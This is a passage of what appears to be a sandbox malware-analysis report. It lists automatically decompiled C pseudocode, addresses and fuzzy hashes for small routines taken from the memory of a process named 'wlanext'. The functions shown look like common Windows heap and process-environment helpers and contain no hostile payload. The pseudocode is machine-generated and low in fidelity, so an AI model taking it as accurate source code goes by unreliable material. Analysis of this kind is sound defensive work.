				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E035B88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E0350C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x34c1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                  0x034e4f2e
                                  0x034e4f34
                                  0x034e4f38
                                  0x03540b85
                                  0x03540b85
                                  0x03540b89
                                  0x03540b9a
                                  0x03540b9a
                                  0x03540b9f
                                  0x00000000
                                  0x03540b9f
                                  0x03540b94
                                  0x03540b98
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x03540b98
                                  0x034e4f3e
                                  0x034e4f48
                                  0x00000000
                                  0x034e4f6e
                                  0x00000000
                                  0x034e4f70

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 37bb72645714eabc540886b29f96b66d6a76b448830a3ebcebe979aac647dac7
                                  • Instruction ID: fa466f78deb7c97862d9e92fd4b19ac2d56924959c4949175faf0978c895ee33
                                  • Opcode Fuzzy Hash: 37bb72645714eabc540886b29f96b66d6a76b448830a3ebcebe979aac647dac7
                                  • Instruction Fuzzy Hash: 37F0E236521B848FD774E718E144B2AF7E8BF0077CF6894A5D5058BAB1C724EC40C648
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350746D Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E0350746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E034FEB70(__ecx, 0x35d79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E035295D0();
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                  0x0350746d
                                  0x0350746d
                                  0x0350746d
                                  0x03507471
                                  0x03507488
                                  0x0354f92d
                                  0x0350748e
                                  0x03507491
                                  0x03507495
                                  0x0354f937
                                  0x0354f93a
                                  0x0354f94e
                                  0x0354f953
                                  0x0354f956
                                  0x0354f956
                                  0x03507495
                                  0x00000000
                                  0x03507488
                                  0x03507473
                                  0x03507478
                                  0x0350747d
                                  0x03507481
                                  0x00000000
                                  0x03507481
                                  0x0350747d
                                  0x0350747a
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 65b17663b6f4d0329b6c49af054174739e5fe7e4abc1460f8b73d208befb24ac
                                  • Instruction ID: 4c50c3a2973ba087ad040bec4ba656219f8a202b9ea262ee0c258b54a5a2cd34
                                  • Opcode Fuzzy Hash: 65b17663b6f4d0329b6c49af054174739e5fe7e4abc1460f8b73d208befb24ac
                                  • Instruction Fuzzy Hash: 33F0B434A00245AECF15DB6CE640B7DBB71BF0C254F084595D4D1AB1F1E726E801C785
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B8CD6 Relevance: .0, Instructions: 31COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 36%
                                  			E035B8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x35dd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E03507D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0352B640(E03529AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                  0x035b8ce5
                                  0x035b8ced
                                  0x035b8cf0
                                  0x035b8cfb
                                  0x035b8d0d
                                  0x035b8cfd
                                  0x035b8d06
                                  0x035b8d06
                                  0x035b8d18
                                  0x035b8d19
                                  0x035b8d1b
                                  0x035b8d20
                                  0x035b8d33

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2cacb57c7d37f9ba0e9f722f4a8151253e57677f23fd601c9ae19f2465be76a1
                                  • Instruction ID: 4d9cd9d7305b608ccbc87aff68291b297adcb579b494bcd709bf4ef3d249cc6e
                                  • Opcode Fuzzy Hash: 2cacb57c7d37f9ba0e9f722f4a8151253e57677f23fd601c9ae19f2465be76a1
                                  • Instruction Fuzzy Hash: C7F0E9719042499FCB00EBA8E445DAE77B8FF49300F110159E811EB3E0DA34E900C754
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351A44B Relevance: .0, Instructions: 29COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0351A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x35d7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0352FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                  0x0351a44b
                                  0x0351a453
                                  0x0351a472
                                  0x0351a476
                                  0x00000000
                                  0x0351a493
                                  0x0351a47a
                                  0x0351a47f
                                  0x0351a486
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d7dc219f633c779ee14d772d53de9e5292fd2d43b5b919d45fa76356baea886d
                                  • Instruction ID: ca06055b6b2254cff9947892ee96d479605f2609c5d29fb79c84e218f01618a6
                                  • Opcode Fuzzy Hash: d7dc219f633c779ee14d772d53de9e5292fd2d43b5b919d45fa76356baea886d
                                  • Instruction Fuzzy Hash: 9AE09272A02421ABE2229E18BC00F66B3ADEBD9A51F0A4435E904CB264D668DD12D7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EF358 Relevance: .0, Instructions: 28COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E034EF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0351F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L03504620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                  0x034ef35d
                                  0x034ef361
                                  0x034ef367
                                  0x034ef372
                                  0x034ef38c
                                  0x034ef38c
                                  0x034ef394

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                  • Instruction ID: 1a48b39eb16b1b9dfbcc75fa3ceba76f4b78764b585a186ae4c5f90eb7324bb8
                                  • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                  • Instruction Fuzzy Hash: F7E0D832A40218BBDB21D7D99E05F5BFBBCEB84A61F050196F904DB1A0D5619D00C6D0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034FFF60 Relevance: .0, Instructions: 22COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034FFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x34c11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E035B88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E03500050(_t14);
				}
			}










                                  0x034fff66
                                  0x034fff6b
                                  0x00000000
                                  0x034fff8f
                                  0x00000000
                                  0x034fff8f

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9e223dfaa85a66cd313fd2134ee29319b5a771bf01670e034bbc7cf8f56fcf4b
                                  • Instruction ID: a84ed5de9d23d000e88fe56719945c8b0c1b33c5c612b6027c9160b6be7fae2e
                                  • Opcode Fuzzy Hash: 9e223dfaa85a66cd313fd2134ee29319b5a771bf01670e034bbc7cf8f56fcf4b
                                  • Instruction Fuzzy Hash: 91E0DFB4205344DFD734DF52E990F2677ACAB82729F1D849FE1084FA42C622D885C22E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0359D380 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0359D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L034EE8B0(__ecx, _a4, 0xfff);
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                  0x0359d38a
                                  0x0359d39b
                                  0x0359d3b1
                                  0x00000000
                                  0x0359d3b6
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                  • Instruction ID: c1dba12e23ae053bac33574371e6430b6919dff6fd9c4c9c89fbdb3ff92930e1
                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                  • Instruction Fuzzy Hash: 74E08C36280204ABEB229A44DC00B697A6AAB447A2F104032BE085E6A0C675AC91D6C4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035741E8 Relevance: .0, Instructions: 21COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E035741E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x35c08f0);
				_t5 = E0353D08C(__ebx, __edi, __esi);
				if( *0x35d87ec == 0) {
					E034FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x35d87ec == 0) {
						 *0x35d87f0 = 0x35d87ec;
						 *0x35d87ec = 0x35d87ec;
						 *0x35d87e8 = 0x35d87e4;
						 *0x35d87e4 = 0x35d87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L03574248();
				}
				return E0353D0D1(_t5);
			}





                                  0x035741e8
                                  0x035741ea
                                  0x035741ef
                                  0x035741fb
                                  0x03574206
                                  0x0357420b
                                  0x03574216
                                  0x0357421d
                                  0x03574222
                                  0x0357422c
                                  0x03574231
                                  0x03574231
                                  0x03574236
                                  0x0357423d
                                  0x0357423d
                                  0x03574247

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 327b046819ee0cf0dc391d2f80ee9b633888deca353652787dc29404d43a43d2
                                  • Instruction ID: 2fc1252facd8c8a7229eb82157e5fa44495e38cd2b89a238466424e7e38bd75e
                                  • Opcode Fuzzy Hash: 327b046819ee0cf0dc391d2f80ee9b633888deca353652787dc29404d43a43d2
                                  • Instruction Fuzzy Hash: 8CF03078512716DFCB76FFAAF500B4436F4F784711F00415A91108B2B8D73544AADF05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351A185 Relevance: .0, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0351A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x35d67e4 >= 0xa) {
					if(_t5 < 0x35d6800 || _t5 >= 0x35d6900) {
						return L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E03500010(0x35d67e0, _t5);
				}
			}





                                  0x0351a190
                                  0x0351a1a6
                                  0x0351a1c2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0351a192
                                  0x0351a192
                                  0x0351a19f
                                  0x0351a19f

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1f6290364ccaf5963d73176792c991ddf92fad65f4a6c6305fdf04c579976b6f
                                  • Instruction ID: b7c06c5a6eb3236299e45ba9402652ddd6246202e2d36aeac6884f8114ee9f27
                                  • Opcode Fuzzy Hash: 1f6290364ccaf5963d73176792c991ddf92fad65f4a6c6305fdf04c579976b6f
                                  • Instruction Fuzzy Hash: FBD0C7216A21881AE73EE308B964B2122A2F7C4620FA0080CE1030A9F5DB60C8E69108
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035116E0 Relevance: .0, Instructions: 17COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E035116E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E03511710(0x35d67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L03504620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                  0x035116e8
                                  0x035116ef
                                  0x035116f3
                                  0x035116fe
                                  0x00000000
                                  0x03511700
                                  0x0351170d
                                  0x0351170d
                                  0x035116f2
                                  0x035116f2
                                  0x035116f2
                                  0x035116f2

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a67f3f0a362c5305936592849d8d52cc5a0fdc457e475c553c1d89894b8daab7
                                  • Instruction ID: 5be7f19154981439901e409bcc84a3f53cf629c6d3971a1601b1a5102f1aa665
                                  • Opcode Fuzzy Hash: a67f3f0a362c5305936592849d8d52cc5a0fdc457e475c553c1d89894b8daab7
                                  • Instruction Fuzzy Hash: 74D05E71210A0292EA2DDA15B814B142361BBC0681F380098F307498E1CFA6CAA2E488
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035653CA Relevance: .0, Instructions: 16COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E035653CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E034FEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                  0x035653ca
                                  0x035653ce
                                  0x035653d9
                                  0x035653de
                                  0x035653e1
                                  0x035653e1
                                  0x035653e6
                                  0x035653f3
                                  0x00000000
                                  0x035653f8
                                  0x035653fb

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                  • Instruction ID: 8f4289449f0277fa806866ae225343d504490588852bee036e8139f9e2c14dc5
                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                  • Instruction Fuzzy Hash: 79E08C35A407809FCF12DF49C650F4EB7F5FB85B40F180418A0085F671C624AC00CB00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034FAAB0 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034FAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                  0x034faab6
                                  0x034faabb
                                  0x0354a442
                                  0x00000000
                                  0x0354a448
                                  0x0354a454
                                  0x0354a454
                                  0x034faac1
                                  0x034faac1
                                  0x034faac6
                                  0x034faac6

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                  • Instruction ID: 2d4b81a7aa9204bbade67fc56bcd2bc908ce1da47754677b2ba346d3f0468b91
                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                  • Instruction Fuzzy Hash: 62D0E935352980CFD65BCB1DD554B1673A8FB44B44FC905D0E505CB761E62CD944CA14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035135A1 Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E035135A1(void* __eax, void* __ebx, void* __ecx) {
				void* _t6;
				void* _t10;
				void* _t11;

				_t10 = __ecx;
				_t6 = __eax;
				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
				}
				if( *((char*)(_t11 - 0x1a)) != 0) {
					return E034FEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				}
				return _t6;
			}






                                  0x035135a1
                                  0x035135a1
                                  0x035135a5
                                  0x035135ab
                                  0x035135ab
                                  0x035135b5
                                  0x00000000
                                  0x035135c1
                                  0x035135b7

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                  • Instruction ID: ab14ca82482bbb09eaab3644c9a4c8e7f9a9b898195616f039a9de60259846e9
                                  • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                  • Instruction Fuzzy Hash: FED0A73D4011809DFB03EB10E1B47687773BB02A04F5D1055C0010947DC3354969C600
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EDB40 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E034EDB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L03504620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                  0x034edb4d
                                  0x034edb54
                                  0x034edb5f
                                  0x034edb56
                                  0x034edb56
                                  0x034edb5c
                                  0x034edb5c

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                  • Instruction ID: 9631b14c2f82fd29a92ed0aa8453e0c8962b22d4087e83862709ac60323f718d
                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                  • Instruction Fuzzy Hash: D7C08C70290B01AFEB229F20CE01B0176A1BB41B02F4800A06300DE0F0EB79D801EA00
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0356A537 Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0356A537(intOrPtr _a4, intOrPtr _a8) {

				return L03508E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
			}



                                  0x0356a553

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                  • Instruction ID: ecb703c86b0d272fdbe8465ed27e4e7c4289827364a989b49685c4d048a60800
                                  • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                  • Instruction Fuzzy Hash: DBC01236080648BBCB12AE81DC00F067B2AFB94B60F048010BA080E5B08632E9B0EA84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03503A1C Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E03503A1C(intOrPtr _a4) {
				void* _t5;

				return L03504620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                  0x03503a35

                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
